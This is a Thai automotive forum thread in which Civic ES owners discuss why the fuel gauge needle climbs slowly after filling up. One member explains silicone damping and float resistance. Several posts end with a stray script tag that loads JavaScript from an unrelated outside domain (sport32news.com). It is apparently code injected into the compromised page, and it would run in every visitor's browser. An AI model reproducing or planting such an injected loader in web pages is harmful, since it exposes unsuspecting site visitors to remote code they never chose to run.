ตอบ
sklongdee

เข้าร่วม: 24 มิถุนา 2014
ตอบ: 69

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 102
ให้คำขอบคุณ: 70

ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 27 ตุลา 2014 08:25 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ

Attached File :
ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
ได้รับคำขอบคุณจาก: karnmotocross01  taomang  qq 
taomang

เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 27 ตุลา 2014 08:44 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
ผมเคยเป็นแบบเติมเต็มถังแต่เข็มไม่ขึ้นเลย จนต้องเดินไปเด็กปั้มว่ามันเต็มรึเปล่า เค้าบอกเต็มแล้ว
ตอนแรกคิดว่าโดนเด็กปั้มหลอก มาดูเข็มนำ้มันค่อยๆขึ้นช้าๆครับ ตอนนี้ก็ใช้งานปรกติครับ คิดว่าอาจจะเป็นที่ลูกลอย
มันค้างก็ได้ครับ ดับเครื่องติดเครื่องใหม่ก็กลับมาเหมือนเดิมครับ"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: sklongdee  qq 
AUM_Love_civic

ชื่อเล่น: อั้ม

เข้าร่วม: 27 กรกฎา 2013
ตอบ: 913

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 643
ให้คำขอบคุณ: 328

ปี: 2001
จันทร์, 27 ตุลา 2014 10:23 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
taomang พิมพ์ว่า:
ผมเคยเป็นแบบเติมเต็มถังแต่เข็มไม่ขึ้นเลย จนต้องเดินไปเด็กปั้มว่ามันเต็มรึเปล่า เค้าบอกเต็มแล้ว
ตอนแรกคิดว่าโดนเด็กปั้มหลอก มาดูเข็มนำ้มันค่อยๆขึ้นช้าๆครับ ตอนนี้ก็ใช้งานปรกติครับ คิดว่าอาจจะเป็นที่ลูกลอย
มันค้างก็ได้ครับ ดับเครื่องติดเครื่องใหม่ก็กลับมาเหมือนเดิมครับ"<script src="https://sport32news.com/civicesgroup.js">

+10ครับ  ผมก็เคยเป็นแบบท่านครับเติมเสร็จขับออกจากปั้มดูเข็มขึ้นไม่เต็มคิดว่าโดนเด็กปั้มเล่นซะแล้ว
แต่ขับไปซักพักมันก็ขึ้นมาปรกติ
อาจไม่เกี่ยวกับคำถามเจ้าของกระทู้นะครับแค่เอามาบอกเล่นเฉยๆนะครับ
ได้รับคำขอบคุณจาก: sklongdee  qq 
aonjang237

ชื่อเล่น: อ้น

เข้าร่วม: 11 มิถุนา 2013
ตอบ: 812

Guru ES
Guru ES

ได้รับคำขอบคุณ: 555
ให้คำขอบคุณ: 130

ปี: 2002
จันทร์, 27 ตุลา 2014 13:42 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
รถผมก็ขึ้นช้าครับ 
ได้รับคำขอบคุณจาก: sklongdee 
srithanon

เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
จันทร์, 27 ตุลา 2014 14:31 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
เกจวัดค่าระดับน้ำมันเชื้อเพลิงที่ติดตั้งแสดงบนหน้าปัทม์นั้น เราจะพบว่าเมื่อเวลาดับเครื่องยนต์ ตำแหน่งเข็มชี้ระดับน้ำมันในถังจะอยู่ที่ตำแหน่งเดิมของระดับน้ำมันในขณะที่ติดเครื่องยนต์ ทั้งนี้ในองประกอบของตัวเรือนเกจตรงกระเปาะโรเตอร์เข็ม จะบรรจุไปด้วยซิลิโคน ซึ่งจะสร้างความหนืดให้กับตัวเข็มที่ชี้ เมื่อเวลาดับเครื่องยนต์เข็มก็จะชี้คงที่

ดังนั้นเวลาที่เราเติมน้ำมันทันทีเราจะไม่เห็นเข็มชี้บอกระดับน้ำมันทันที มันจะค่อยๆขยับขึ้นและเอาชนะความหนืดของตัวซิลิโคน ยิ่งเติมน้ำมันน้อยๆลงไปในถังก็จะยิ่งช้า เพราะการเลื่อนต่ำแหน่งของตัวค่าความต้านทานของลูกลอย มีค่าเปลี่ยนแปลงน้อย ทำให้กระแสไฟที่ไหลผ่านขดลวดที่จะไปสร้างมนามแม่เหล็กมีน้อย ทำให้อำนาจการเหนี่ยวนำดึงเข็มชี้มีไม่มาก และประกอบกับเข็มชี้จะต้องเอาชนะความหนืด ก็จะทำให้เข็มเปลี่ยนตำแหน่งช้า หากเราเติมน้ำมันให้มากๆหรือเต็มถัง ค่าความต้านทานจากชุดลูกลอยในถังจะน้อย จะมห้ให้มีกระแสไหลในขดลวดโครงสร้างของตัวเกจมีมาก เกิดอำนาจเส้นแรงแม่เหล็หมาก จะพบว่าเข็มชี้บอกตำแหน่งจะเอาชนะความหนือของซิลิโคนเร็วขึ้น แต่ก็ไม่ทันที ในกรณีที่เติมเต็มถังแล้วขึ้นช้าผิดปกติ ตัวซิลิโคนอาจจะเสื่อมสสภาพเกิดความหนืดมากขึ้นจะสังเกตุรถใหม่ๆจะขึ้นเร็ว เพราะความหนืดยังไม่มากครับ........srithanon
ได้รับคำขอบคุณจาก: sklongdee  qq  Bird_phetch  NuuTeee 
sklongdee

สมาชิกสับสน
สมาชิกสับสน

จันทร์, 27 ตุลา 2014 15:02 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ

AUM_Love_civic พิมพ์ว่า:

+10ครับ  ผมก็เคยเป็นแบบท่านครับเติมเสร็จขับออกจากปั้มดูเข็มขึ้นไม่เต็มคิดว่าโดนเด็กปั้มเล่นซะแล้ว
แต่ขับไปซักพักมันก็ขึ้นมาปรกติ
อาจไม่เกี่ยวกับคำถามเจ้าของกระทู้นะครับแค่เอามาบอกเล่นเฉยๆนะครับ

ของผมก็ประมาณนั้นละครับ เวลาสตาร์ชตอนเช้าเข็มมันจะค่อยๆขึ้นแบบช้ามาก แต่บางทีก็ขึ้นเร็ว เอาใจไม่ถูกเลยทีเดียว --"
ได้รับคำขอบคุณจาก: qq 
sklongdee

สมาชิกสับสน
สมาชิกสับสน

จันทร์, 27 ตุลา 2014 15:03 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
aonjang237 พิมพ์ว่า:
รถผมก็ขึ้นช้าครับ 

555 นึกว่าผมเป็นคนเดียว
sklongdee

สมาชิกสับสน
สมาชิกสับสน

จันทร์, 27 ตุลา 2014 15:18 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
srithanon พิมพ์ว่า:
เกจวัดค่าระดับน้ำมันเชื้อเพลิงที่ติดตั้งแสดงบนหน้าปัทม์นั้น เราจะพบว่าเมื่อเวลาดับเครื่องยนต์ ตำแหน่งเข็มชี้ระดับน้ำมันในถังจะอยู่ที่ตำแหน่งเดิมของระดับน้ำมันในขณะที่ติดเครื่องยนต์ ทั้งนี้ในองประกอบของตัวเรือนเกจตรงกระเปาะโรเตอร์เข็ม จะบรรจุไปด้วยซิลิโคน ซึ่งจะสร้างความหนืดให้กับตัวเข็มที่ชี้ เมื่อเวลาดับเครื่องยนต์เข็มก็จะชี้คงที่

ดังนั้นเวลาที่เราเติมน้ำมันทันทีเราจะไม่เห็นเข็มชี้บอกระดับน้ำมันทันที มันจะค่อยๆขยับขึ้นและเอาชนะความหนืดของตัวซิลิโคน ยิ่งเติมน้ำมันน้อยๆลงไปในถังก็จะยิ่งช้า เพราะการเลื่อนต่ำแหน่งของตัวค่าความต้านทานของลูกลอย มีค่าเปลี่ยนแปลงน้อย ทำให้กระแสไฟที่ไหลผ่านขดลวดที่จะไปสร้างมนามแม่เหล็กมีน้อย ทำให้อำนาจการเหนี่ยวนำดึงเข็มชี้มีไม่มาก และประกอบกับเข็มชี้จะต้องเอาชนะความหนืด ก็จะทำให้เข็มเปลี่ยนตำแหน่งช้า หากเราเติมน้ำมันให้มากๆหรือเต็มถัง ค่าความต้านทานจากชุดลูกลอยในถังจะน้อย จะมห้ให้มีกระแสไหลในขดลวดโครงสร้างของตัวเกจมีมาก เกิดอำนาจเส้นแรงแม่เหล็หมาก จะพบว่าเข็มชี้บอกตำแหน่งจะเอาชนะความหนือของซิลิโคนเร็วขึ้น แต่ก็ไม่ทันที ในกรณีที่เติมเต็มถังแล้วขึ้นช้าผิดปกติ ตัวซิลิโคนอาจจะเสื่อมสสภาพเกิดความหนืดมากขึ้นจะสังเกตุรถใหม่ๆจะขึ้นเร็ว เพราะความหนืดยังไม่มากครับ........srithanon

แน่นมาก ความรู้ล้วนๆ ขอบคุณมากๆเลยครับ งั้นคงเป็นเพราะผมชอบปล่อยให้น้ำมันลงขีดแดงตลอดแล้วค่อยเติม ต้องเปลี่ยนพฤติกรรมการเติมน้ำมันแล้ว

"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: qq 
qq

เข้าร่วม: 10 กุมภา 2012
ตอบ: 118

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 144
ให้คำขอบคุณ: 2652

ปี: 2005
จันทร์, 27 ตุลา 2014 20:25 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
แช่แดงไม่ดีนะคับเดวปั้มติ๊กเสียนะคับ
aumlight

ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 27 ตุลา 2014 22:08 - ขอสอบถามครับเข็มน้ำมันขึ้นช้ามากผิดปรกติ แก้ไขยังไงครับ
srithanon พิมพ์ว่า:

ใช่เลยครับ เข็มน้ำมันรถใหม่ขึ้นเร็วมากกก

ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.